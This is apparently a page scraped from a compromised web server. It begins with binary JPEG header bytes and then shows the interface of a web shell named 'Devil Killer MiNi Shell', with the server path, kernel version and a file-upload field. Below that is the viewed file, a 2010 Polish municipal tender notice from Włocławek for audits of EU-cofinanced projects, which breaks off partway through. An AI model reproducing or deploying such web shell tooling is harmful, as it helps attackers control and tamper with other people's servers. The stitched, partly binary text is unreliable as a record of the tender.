JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101015/332326-N-2010.html

<p class="kh_header"><b>Włocławek: Przeprowadzenie  audytów  zewnętrznych  projektów współfinansowanych 
z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 332326 - 2010; data zamieszczenia: 15.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent  Miasta Włocławek , ul. Zielony Rynek 11/13, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4144000, faks 4144257.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie  audytów  zewnętrznych  projektów współfinansowanych 
z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie  audytów  zewnętrznych  projektów współfinansowanych z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007-2013 z możliwością składania ofert częściowych na poszczególne zadania:
Zadanie I - Włocławska Strefa Rozwoju Gospodarczego - Park Przemysłowo -Technologiczny. 
Zadanie II - Włocławski Inkubator Innowacji i Przedsiębiorczości.
Zadanie III - Promocja terenów inwestycyjnych Włocławskiej Strefy Rozwoju Gospodarczego podczas Międzynarodowych Targów Nieruchomości Inwestycyjnych Expo Real 2010 - Monachium Niemcy, październik 2010 roku.

Szczegółowy opis przedmiotu zamówienia dla Zadania I, Zadania II, Zadania III:
1.  Audyt obejmuje przede wszystkim sprawdzenie:
1)czy Beneficjent realizuje projekt zgodnie z umową o dofinansowanie i wnioskiem o dofinansowanie oraz z obowiązującymi przepisami prawa, w tym m.in. z:
a)Rozporządzeniem Rady (WE) nr 1083/2006 z dnia 11 lipca 2006r ustanawiającym przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego Europejskiego Funduszu Społecznego oraz Funduszu Spójności 
i uchylającym rozporządzenie nr 1260/1999.
b)Rozporządzeniem (WE) nr 1081/2006 Parlamentu Europejskiego i Rady z dnia 5 lipca 2006 r w sprawie Europejskiego Funduszu Rozwoju Regionalnego 
i uchylającym rozporządzenie (WE) nr 1783/1999,
c)Rozporządzenia Komisji (WE) nr 1828/2006 z dnia 8 grudnia 2006r. ustanawiające szczegółowe zasady wykonania rozporządzenia Rady (WE) nr 1083/2006 ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności oraz rozporządzenia (WE) nr 1080/2006 w sprawie Europejskiego Funduszu Rozwoju Regionalnego,
d)ustawą z dnia 6 grudnia 2006 r. o zasadach prowadzenia polityki rozwoju (Dz. U. 2006 nr 227, poz.1658 z późn. zm.),
e)ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj D.U.2007 Nr 223, poz.1655),
f)	ustawą z dnia 29 września 1994 r o rachunkowości (Dz. U. 1994 Nr 121 poz 591 z późn. zm.),

oraz z:
g)	Regionalnym Programem Operacyjnym Województwa Kujawsko-Pomorskiego na lata 2007-2013 przyjętym Uchwałą Nr 70/892/07 przez Zarząd Województwa Kujawsko-Pomorskiego z dnia 23 października 2007 r. z późn. zm.
h)	Szczegółowym Opisem Priorytetów Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007 -2013,
i)	Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Kujawsko-Pomorskiego na lata 2007-2013,
2)	czy procedury kontroli wewnętrznej Beneficjenta zapewniają prawidłowość realizacji  projektu, rzetelność wniosków o płatność, oraz, że ponoszone wydatki są kwalifikowane,
3)	czy Beneficjent posiada odpowiednie procedury finansowo-księgowe oraz procedury dotyczące, w odniesieniu do każdej operacji i stosownie do potrzeb, specyfikacji technicznej, planu finansowego, dokumentacji przyznania pomocy, dokumentacji z przeprowadzonego postępowania o udzielenie zamówienia publicznego, sprawozdania z postępu prac oraz sprawozdań z przeprowadzonych weryfikacji i audytów,
4)	prowadzenia przez Beneficjenta odrębnej ewidencji księgowej na potrzeby projektu,
5)	kwalifikowalności wydatków oraz sposobu ich dokumentowania,
6)	zgodność wniosków o płatność z księgami rachunkowymi Beneficjenta 
w części dotyczącej projektu,
7)	wiarygodności wniosków o płatność w zakresie sprawozdawczości 
z realizacji projektu, odnośnie danych rzeczowych oraz osiągania zakładanych celów i wskaźników,
8)	czy Beneficjent wdrożył zalecenia przeprowadzonych kontroli oraz usunął ewentualne nieprawidłowości,
9)	systemu archiwizacji dokumentacji zgromadzonej w ramach realizowanego projektu,
10) czy Beneficjent, w zakresie informacji i promocji, stosuje się do 
      zapisów zawartych w umowie o dofinansowanie projektu,
2. W/w zakres audytu projektu jest wymaganym minimum. Wykonawca może rozszerzyć zakres audytu o inne elementy, które jego zdaniem powinny zostać poddane audytowi po uzyskaniu zgody Zamawiającego.
3. Audyt powinien zostać przeprowadzony zgodnie z polskimi i międzynarodowymi standardami audytu. Wykonawca przeprowadzający audyt jest zobowiązany do określenia na podstawie jakich standardów będzie dokonywał czynności audytowych.

4. Podczas realizacji audytu powinna zostać zweryfikowana całość dokumentacji, lub próbka ogółem poniesionych wydatków, pozwalająca wydać audytorowi wiążącą opinię i sporządzić raport w tym zakresie. Wymagany poziom ufności to 95 %, natomiast próg istotności na poziomie nie wyższym niż 1 % kosztów kwalifikowanych projektu.
Próbkowanie - Wykonawca dokona audytu co najmniej 10% dokumentacji finansowej    oraz co najmniej 10% dokumentacji merytorycznej. Dobór próby - audyt powinien być przeprowadzony z zastosowaniem statystycznych metod doboru próby 
w zakresie dokumentów finansowych, w zakresie dokumentów merytorycznych dopuszcza się zastosowanie metod niestatystycznych.
5. Wykonawca zobowiązany jest przygotować opinię  i raport audytu po jego przeprowadzeniu.
7. Wykonawca zobowiązany jest:
-  przeprowadzić audyt zgodnie z polskimi i międzynarodowymi  standardami audytu;
- w ofercie  określić na podstawie jakich  standardów będzie dokonywał czynności audytowych.
8. Zamawiający  poddany audytowi ma prawo do odniesienia się do opinii i  raportu z audytu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykonawca winien wykonać  w okresie ostatnich 3  lat przed upływem terminu składania ofert,  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 2  audytów projektów realizowanych z udziałem środków finansowych pochodzących z budżetu  Unii Europejskiej;
-  dla Zadania  I i Zadnia II  - 15 000 000,00 zł brutto - każda (całkowita wartość projektu);
-  dla Zadania  III   - 50 000,00 zł brutto - każda (całkowita wartość projektu).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien się wykazać, że dysponuje lub będzie dysponował zespołem audytowym: min. 2 osobami spełniającymi wymogi dotyczące audytorów wewnętrznych określonych w art. 286  ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (tekst jednolity Dz. U. 09.157.1240), posiadającymi doświadczenie  w przeprowadzeniu  min. 2 audytów projektów finansowanych ze środków publicznych współfinansowanych ze środków UE każda z  wykazanych osób; 
-  w tym min. 1 osoba  w zespole  audytowym winna mieć uprawnienia biegłego rewidenta, zgodnie z  ustawą z dnia 7 maja 2009 r. o biegłych rewidentach i ich samorządzie, podmiotach uprawnionych do badania sprawozdań finansowych oraz o nadzorze publicznym (tekst jednolity Dz.U.09.77.649);
- w tym min. 1 osoba w zespole  audytowym posiadająca doświadczenie 
w przeprowadzaniu min. 2  audytów projektów infrastrukturalnych ze środków publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać się posiadaniem opłaconej polisy, a w przypadku jej   braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia na kwotę min. 25 000,00 zł (dotyczy tylko Zadania I 
i Zadania II).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Metoda badania - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania istniej  zmian w umowie dot.:.
1) w przypadku zmiany Wytycznych dotyczących przeprowadzenia audytu Zamawiający sobie zastrzega  możliwość przedłużenia terminu realizacji umowy,
2) zmiany wynagrodzenia w przypadku ustawowej zamiany podatku VAT,
3) zmiany osób wymienionych w umowie po stronie którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Włocławek
Wydział Inwestycji i Zamówień Publicznych - pok. 506
Zielony Rynek 11/13, 87 -800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2010 godzina 10:30, miejsce: Biuro Obsługi Mieszkańców, mieszczące się w holu budynku A na stanowisku d/s obsługi kancelaryjnej Prezydenta Miasta Włocławek,
Urząd Miasta Włocławek,
Zielony Rynek 11/13, 87 -800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Audyt dotyczy projektów współfinansowanych ze środków Europejskiego Funduszu Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomrskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I -Włocławska Strefa Rozwoju Gospodarczego - Park Przemysłowo -  Technologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I -Włocławska Strefa Rozwoju Gospodarczego - Park Przemysłowo -  Technologiczny, (Nr projektu RPKP.05.06.00-04-002/09, umowa WPW.II.3043-2-286-15/2009);
Oś priorytetowa 5 Wzmocnienie konkurencyjności przedsiębiorstw
 Działanie 5.6 Kompleksowe uzbrojenie terenów pod inwestycje
Cel główny projektu - uzbrojenie w niezbędną infrastrukturę techniczną terenów inwestycyjnych o powierzchni 33, 4762 ha położonych przy ul.Wiklinowej  w sąsiedztwie Anwilu S.A, w tym:
- drogi publiczne 93,1 km),
- sieć i urządzenia kanalizacji deszczowej (4198 m) i sanitarnej (3496,5 m),
- sieć wodociągową gospodarczą (5452,5 m) i pożarową (5457,5 m),
- sieć gazową (3069 m),
- sieć teletechniczną (3671 m),
- sieci i urządzenia elektroenergetyczne (3638 m)
Okres realizacji projektu wrzesień 2009 - grudzień 2010
Koszt projektu   32 801 970,91 zł brutto.
Koszt kwalifikowany  26 430 724,51 zł brutto
Kwota dofinansowania 15 858 434,71 zł brutto
Do chwili obecnej zostało złożonych przez Zamawiającego (Beneficjenta) 5 szt. wniosków o płatność na kwotę 13 110 076,44 zł brutto, z czego 5  szt. wniosków zostały zatwierdzone przez IZ na kwotę 6.998.829,52 zł brutto. Planowane złożenie wniosku we wrześniu 2010r na kwotę wydatków kwalifikowanych w wysokości  5.417.179,63, kwota dofinansowania z wniosku za wrzesień to 4.604.602,69 zł.
Szczegółowy opis przedmiotu zamówienia:
1.  Audyt obejmuje przede wszystkim sprawdzenie:
1)	czy Beneficjent realizuje projekt zgodnie z umową o dofinansowanie i wnioskiem o dofinansowanie oraz z obowiązującymi przepisami prawa, w tym m.in. z:
a)	Rozporządzeniem Rady (WE) nr 1083/2006 z dnia 11 lipca 2006r ustanawiającym przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego Europejskiego Funduszu Społecznego oraz Funduszu Spójności i uchylającym rozporządzenie nr 1260/1999.
b)	Rozporządzeniem (WE) nr 1081/2006 Parlamentu Europejskiego i Rady z dnia 5 lipca 2006 r w sprawie Europejskiego Funduszu Rozwoju Regionalnego i uchylającym rozporządzenie (WE) nr 1783/1999,
c)	Rozporządzenia Komisji (WE) nr 1828/2006 z dnia 8 grudnia 2006r. ustanawiające szczegółowe zasady wykonania rozporządzenia Rady (WE) nr 1083/2006 ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności oraz rozporządzenia (WE) nr 1080/2006 w sprawie Europejskiego Funduszu Rozwoju Regionalnego,
d)	ustawą z dnia 6 grudnia 2006 r. o zasadach prowadzenia polityki rozwoju (Dz. U. 2006 nr 227, poz.1658 z późn. zm.),
e)	ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj D.U.2007 Nr 223, poz.1655),
f)	ustawą z dnia 29 września 1994 r o rachunkowości (Dz. U. 1994 Nr 121 poz 591 z późn. zm.),

oraz z:
g)	Regionalnym Programem Operacyjnym Województwa Kujawsko-Pomorskiego na lata 2007-2013 przyjętym Uchwałą Nr 70/892/07 przez Zarząd Województwa Kujawsko-Pomorskiego z dnia 23 października 2007 r. z późn. zm.
h)	Szczegółowym Opisem Priorytetów Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007 -2013,
i)	Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Kujawsko-Pomorskiego na lata 2007-2013,
2)	czy procedury kontroli wewnętrznej Beneficjenta zapewniają prawidłowość realizacji  projektu, rzetelność wniosków o płatność, oraz, że ponoszone wydatki są kwalifikowane,
3)	czy Beneficjent posiada odpowiednie procedury finansowo-księgowe oraz procedury dotyczące, w odniesieniu do każdej operacji i stosownie do potrzeb, specyfikacji technicznej, planu finansowego, dokumentacji przyznania pomocy, dokumentacji z przeprowadzonego postępowania o udzielenie zamówienia publicznego, sprawozdania z postępu prac oraz sprawozdań z przeprowadzonych weryfikacji i audytów,
4)	prowadzenia przez Beneficjenta odrębnej ewidencji księgowej na potrzeby projektu,
5)	kwalifikowalności wydatków oraz sposobu ich dokumentowania,
6)	zgodność wniosków o płatność z księgami rachunkowymi Beneficjenta 
w części dotyczącej projektu,
7)	wiarygodności wniosków o płatność w zakresie sprawozdawczości 
z realizacji projektu, odnośnie danych rzeczowych oraz osiągania zakładanych celów i wskaźników,
8)	czy Beneficjent wdrożył zalecenia przeprowadzonych kontroli oraz usunął ewentualne nieprawidłowości,
9)	systemu archiwizacji dokumentacji zgromadzonej w ramach realizowanego projektu,
10) czy Beneficjent, w zakresie informacji i promocji, stosuje się do 
      zapisów zawartych w umowie o dofinansowanie projektu,
2. W/w zakres audytu projektu jest wymaganym minimum. Wykonawca może rozszerzyć zakres audytu o inne elementy, które jego zdaniem powinny zostać poddane audytowi po uzyskaniu zgody Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Metoda badania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II - Włocławski Inkubator Innowacji i Przedsiębiorczości..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie II - Włocławski Inkubator Innowacji i Przedsiębiorczości, (Nr projektu  RPKP.05.04.00-04-002/09, umowa WPW.II.3043-2-296-97/2009);
Oś priorytetowa 5 Wzmocnienie konkurencyjności przedsiębiorstw
Działanie 5.4. Wzmocnienie regionalnego potencjału badań i rozwoju technologii
Cel główny projektu -  Przebudowa i rozbudowa istniejącego już budynku z adaptacją na funkcje 
produkcyjno-usługowo-magazynową oraz biurowo-szkoleniową.
Okres realizacji projektu  listopad 2009  r.- styczeń 2011r.
Koszt projektu   20 137 718,19 zł brutto.
Koszt kwalifikowany  20 088 848,39 zł brutto.
Kwota dofinansowania  11 679 268,44 zł brutto.
Do chwili obecnej zostało złożonych przez Zamawiającego (Beneficjenta)  4 szt. wniosków o płatność na kwotę 7 157 141,57  zł brutto, z czego 4 szt. wniosków zostało zatwierdzonych przez IZ na  kwotę 5.049.205,71 zł brutto. Planowane złożenie wniosku we wrześniu 2010r na kwotę wydatków kwalifikowanych w wysokości  8.167.314,75, kwota dofinansowania z wniosku za wrzesień to 5.717.120,33 zł.
Szczegółowy opis przedmiotu zamówienia:
1.  Audyt obejmuje przede wszystkim sprawdzenie:
